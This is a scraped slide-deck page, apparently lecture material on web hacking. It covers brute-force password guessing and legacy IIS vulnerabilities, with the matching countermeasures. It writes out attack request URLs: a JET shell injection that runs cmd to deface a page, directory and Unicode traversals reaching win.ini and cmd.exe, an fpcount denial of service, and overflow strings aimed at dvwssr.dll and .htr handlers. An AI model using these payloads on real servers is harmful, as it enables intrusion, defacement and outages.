180 likes | 381 Views
Web Hacking. Brute Force Password Guessing Vulnerabilities IIS …. Brute Force Password Guessing. Tools Brutus, http://www.hoobie.net/brutus/brutus-download.html “Dictionary file”. IIS Vulnerability. Catalog_type.asp NT ODBC Remote Compromise
E N D
Web Hacking • Brute Force Password Guessing • Vulnerabilities • IIS • …..
Brute Force Password Guessing • Tools • Brutus, http://www.hoobie.net/brutus/brutus-download.html • “Dictionary file”
IIS Vulnerability • Catalog_type.asp • NT ODBC Remote Compromise • Vulnerability of “JET data base engine” (for Windows NT) • SQL query +|shell(”instruction”) • |http://ipaddress/AdvWorks/equipment/catalog_type.asp?ProductType=|shell(“cmd+/c+echo Hacked By Somebody >c:\..default.html”)| • Code.asp • A problem with String Matching • /ADvWorks, /ASPSamp • http://ipaddress/AdvWorks/code.asp?source=/AdvWorks/../../../winnt/win.ini • Countermeasure • Remove these ASP
IIS vulnerability: FPcount • DoS attack • http://ip address/_vti_bin/fpcount.exe?Page=default.htm|image=1Digits=20000 • Reserve 476K per request.. • Countermeasure • Remove fpcount.exe
IIS vulnerability: ISS Unicode • %C1%9c Unicode “\” • http://ipaddress/scripts/..%c1%9c..\winnt\system32\cmd.exe?/c+dir • /scripts : IIS’s default setting of this folder is executable • Consequence: do everything they want, include
Countermeasure of Web Hacking • Do not use IIS (refer to appendix A) • Patch your Web Server • Remove unnecessary services • IIS examples • Fpcount • ….. (check IIS vulnerability list)
Msadcs.dll (same with Catalog_type.asp ) Countermeasure Patch document: number, MS99-025 Remove it, if you don’t need it Patch it, if you need it Version of MDAC (check Msdadc.dll, Oledb32.dll) MDAC 1.5 Upgrade to 2.1 handlerRequired(Set DWOD value to 1) MDAC 2.0 handlerRequired(Set DWOD value to 1) Delete RDS examples IIS vulnerability: MDAC/RDS
IIS vulnerability: FrontPage98 dvwssr.dll • Source code of ASP • Assumption: right to modify homepage • Encryption : (key: Netscape engineers are weenies) • Tool: dvwssr.exe (Perl code, wrote by “Rain Forest Puppy”) • Buffer overflow • http://ip address/GET/_vti_aut/dvssr.dll?aaaaa…(5,000 “a” or whatever) • Countermeasure: remove dvwssr.dll directly, or install window 2000, office 2000 extension, frontpage 2000 server extensions(remove dvwssr.dll automatically)
IIS vulnerability: Malformed HTR Request (MS99-019) • ISM.DLL (Buffer overflow) • .htr • http://ip address/aaaa…aaaaaaaaaaaaaa.htr (abount 3,000 a)